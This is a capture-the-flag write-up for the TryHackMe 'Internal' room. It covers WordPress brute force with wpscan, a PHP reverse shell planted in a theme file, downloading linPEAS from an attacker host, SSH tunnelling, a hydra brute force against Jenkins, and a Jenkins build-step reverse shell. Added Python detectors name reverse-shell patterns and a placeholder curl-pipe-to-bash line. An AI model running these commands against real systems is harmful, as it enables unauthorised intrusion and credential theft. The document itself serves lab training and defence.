Disclaimer -> All passwords and flags have been masked due to the rules for an official TryHackMe writeup.
- Type: free
- Difficulty: Hard
- Mode: Unguided Capture the Flag (user.txt / root.txt)
- Covered topics / techniques / tools
- Abusing Jenkins Build Process
- Hydra Login Brute Force
- SSH Local Port Forwarding
As always we check the full TCP scan first, and the result is pretty manageable.
So what do we have?
- Port 22 SSH
- Port 80 Web Server
Operating System: Ubuntu Linux
Software: Apache 2.4.29; OpenSSH 7.6p1
As there is a web server, the gobuster log file is worth a look.
On index.html the web server shows the default Apache page. On /blog we get a generic WordPress page. With that in mind we can use a nice tool to pull more information out of WordPress sites.
WPScan lets us enumerate the WordPress instance automatically, checking all posts for usernames, plugins, themes and more.
wpscan --url http://internal.thm/blog -e
With a username in hand, the next mission is to get its password. Luckily WPScan comes with a brute force feature: by providing a wordlist we can run it with the following command.
wpscan --url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt
Time to log in and check out any interesting posts and where we can put our file for a reverse shell!
The plugins were write protected and I had to take a look at the theme editor. In the running theme we can edit e.g. the file 404.php and plant our code in there. Source of PHP code
Reverse Shell Blog
Make sure that you put in your IP and a desired port for the listener.
Immediately start our listener and visit the page in the browser or via curl.
nc -nlvp 4444
Best practice is to stabilize our shell with python.
# remote
python3 -c 'import pty; pty.spawn("/bin/bash")'
# CTRL^Z to put the shell in the background
# local
stty raw -echo; fg
# remote
export TERM=xterm
reset
Now we have tab completion and will not lose our shell by hitting CTRL^C. Because things are going so well, we start our local HTTP server and upload linPEAS for local enumeration and possible privilege escalation vectors. Start the web server in the directory where the files you want to share are stored. Download the script, make it executable and pipe the output into a log file so you can take a look at it afterwards.
less -r will show you the colored output.
# local
sudo python3 -m http.server 80
# remote
wget http://attackerIP/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.log
Snippets of linpeas.log
/var/www/html/wordpress/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'wordpress123' );
define( 'DB_HOST', 'localhost' );
[+] Searching passwords in config PHP files
$pwd = trim( wp_unslash( $_POST['pwd'] ) );
$dbpass='B2Ud4fEOZmVq';
$dbuser='phpmyadmin';
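The linPEAS hit above is the classic case of database credentials sitting in plaintext in a web application's config file. As an added example (not from the original writeup or from linPEAS), the Python below implements the same check a defender would run over a web root: it pulls `define('NAME', 'value')` constants and `$var='value';` assignments out of PHP config text and keeps only those whose name looks like a secret. The sample config is constructed to mirror the wp-config.php snippet, with placeholder values instead of the real ones; note that the `$pwd = trim(...)` line that linPEAS reported is skipped, because it assigns a runtime expression rather than a literal.

```python
import re

# Constructed sample modelled on the wp-config.php output above; the passwords are placeholders.
SAMPLE_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'example-db-pass' );
define( 'DB_HOST', 'localhost' );
$dbuser='phpmyadmin';
$dbpass='example-pma-pass';
$pwd = trim( wp_unslash( $_POST['pwd'] ) );
"""

# define( 'NAME', 'literal' )  and  $name = 'literal';
DEFINE_RE = re.compile(r"""define\(\s*['"]([A-Za-z0-9_]+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")
ASSIGN_RE = re.compile(r"""\$([A-Za-z0-9_]+)\s*=\s*['"]([^'"]*)['"]\s*;""")
# Names that usually hold something worth protecting.
SECRET_NAME_RE = re.compile(r"(pass|pwd|secret|token|key)", re.IGNORECASE)


def find_credentials(text):
    """Return [(line_number, name, value)] for every literal secret in PHP config text.

    Only quoted literals are reported, so an assignment from a function call
    (like the $_POST handling line) produces no finding."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for regex in (DEFINE_RE, ASSIGN_RE):
            for name, value in regex.findall(line):
                if value and SECRET_NAME_RE.search(name):
                    hits.append((lineno, name, value))
    return hits


def redact(value):
    """Mask a secret for a report the way a writeup would: keep the first character only."""
    return value[:1] + "*" * (len(value) - 1) if value else value


if __name__ == "__main__":
    for lineno, name, value in find_credentials(SAMPLE_CONFIG):
        print(f"line {lineno}: {name} = {redact(value)}")
```

Run against a real web root with something like `for f in $(find /var/www -name '*.php'); do ...; done`, the same function gives a quick inventory of which files would leak credentials to anyone who reaches the file system as www-data, which is exactly the position the reverse shell puts you in.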
Unfortunately these credentials won't help us, but as this is a penetration test we put them in our notes. What else we can write down is that there is another local user on that box.
cat /etc/passwd shows us
After a while I found a text file in /opt
www-data@internal:/opt$ cat wp-save.txt
Bill, Aubreanna needed these credentials for something later. Let her know you have them and where they are. aubreanna:[CONFIDENTIAL]
It seems that we found a pair of credentials, and we'll use them right away with ssh.
Now grab that user flag and check out the rest of the home directory.
The jenkins.txt tells us “Internal Jenkins service is running on 172.17.0.2:8080” and we can confirm that with the command
At this point we have to forward the port 8080 from that machine to us with
ssh email@example.com -L 8080:localhost:8080
Now we can access the service on our attacking machine via http://localhost:8080
Ok, none of the credentials we found work. The default username of a Jenkins installation is “admin”, so let's capture a login request with Burp Suite and fire up hydra with the correct HTTP parameters.
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8080 127.0.0.1 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" -V -f
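Seen from the other side, a run like the one above is very loud: one source hammering the same login endpoint many times a minute. As an added example (not part of the original writeup), the Python below is the detection a defender would put in front of Jenkins. It parses Apache-style combined access log lines such as a reverse proxy in front of Jenkins would write (assumption: Jenkins' own access logging is not relied on), counts POSTs to `/j_acegi_security_check` per source IP inside a sliding window, and flags sources that reach a threshold. The log lines are constructed in the block; the IPs, timestamps and user agent are placeholders.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/j_acegi_security_check"   # the form login endpoint hydra targets above

# Apache combined log format: ip ident user [time] "method path proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def _line(ip, second, method="POST", path=LOGIN_PATH, status=302):
    """Build one constructed access-log line (assumed reverse-proxy format)."""
    return (f'{ip} - - [10/Oct/2020:13:55:{second:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 0 "-" "constructed-agent"')


# Constructed sample: 15 login POSTs in 30 s from one source, normal activity from another.
SAMPLE_LOG = (
    [_line("10.0.0.5", s) for s in range(0, 30, 2)]
    + [_line("10.0.0.9", 3, "GET", "/login", 200), _line("10.0.0.9", 40)]
)


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: peak_login_posts_in_window} for sources at or above the threshold.

    Every POST to the login endpoint counts, regardless of status, so a success
    right after a burst of failures (hydra -f stops on the first hit) is still flagged."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == LOGIN_PATH:
            attempts[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, stamps in attempts.items():
        stamps.sort()
        start = peak = 0
        for end, ts in enumerate(stamps):          # sliding window over sorted timestamps
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

The threshold of ten attempts per minute is deliberately low for an admin interface that should see a handful of logins a day; on a Jenkins that is only reachable through an SSH tunnel, as here, the source IP in the log will be the forwarding host, so the alert should be correlated with the SSH session that opened the tunnel.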
Reverse Shell Docker
After logging in we can create a new project (Freestyle project) and plant our command for a reverse shell in the build process.
As usual we start our listener nc -nlvp 4444 before we hit the “Build Now”-Button.
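Because a freestyle job's shell build step runs with the privileges of the Jenkins process, every job configuration is effectively code that someone with job-create rights can execute on the build host. As an added example (not from the original writeup or from Jenkins itself), the Python below audits a job's `config.xml`, iterating over the `hudson.tasks.Shell` builders that freestyle projects store their "Execute shell" steps in, and flags commands matching a few generic indicators of a step that executes something other than a build. The job XML is constructed; the flagged command is a placeholder download-and-run pattern with an `.invalid` host, not the writeup's payload.

```python
import re
import xml.etree.ElementTree as ET

# Constructed config.xml for a Freestyle project with two "Execute shell" build steps.
SAMPLE_JOB_XML = """<project>
  <description>nightly build (constructed sample)</description>
  <builders>
    <hudson.tasks.Shell>
      <command>make test</command>
    </hudson.tasks.Shell>
    <hudson.tasks.Shell>
      <command>curl -s http://example.invalid/setup.sh | bash</command>
    </hudson.tasks.Shell>
  </builders>
</project>
"""

# Indicators that a build step is fetching or running something other than the build.
SUSPICIOUS = [
    ("pipe-to-shell", re.compile(r"\|\s*(ba)?sh\b")),
    ("dev-tcp", re.compile(r"/dev/tcp/")),
    ("netcat-exec", re.compile(r"\bnc\b.*\s-e\s")),
    ("interactive-bash", re.compile(r"\bbash\s+-i\b")),
]


def shell_steps(xml_text):
    """Return the command text of every 'Execute shell' build step in job config.xml."""
    root = ET.fromstring(xml_text)
    return [(step.findtext("command") or "").strip() for step in root.iter("hudson.tasks.Shell")]


def audit_job(xml_text):
    """Return [(step_index, indicator, command)] for build steps matching an indicator."""
    findings = []
    for idx, cmd in enumerate(shell_steps(xml_text)):
        for label, rx in SUSPICIOUS:
            if rx.search(cmd):
                findings.append((idx, label, cmd))
    return findings


if __name__ == "__main__":
    for idx, label, cmd in audit_job(SAMPLE_JOB_XML):
        print(f"step {idx}: {label}: {cmd}")
```

Pointed at `$JENKINS_HOME/jobs/*/config.xml` on a schedule, the audit catches the job after the fact; the preventive control is not handing out job-configure rights to an account protected by a rockyou password, and keeping the Jenkins user's reach on the build host as small as the /opt note in the next step shows it was not.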
This part will be a quick one. No kernel exploit, no sudo misconfiguration or other unpatched binaries. Just a note with credentials, which is still a thing “in the wild”.
jenkins@jenkins:/opt$ cat note.txt
Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you
need access to the root user account.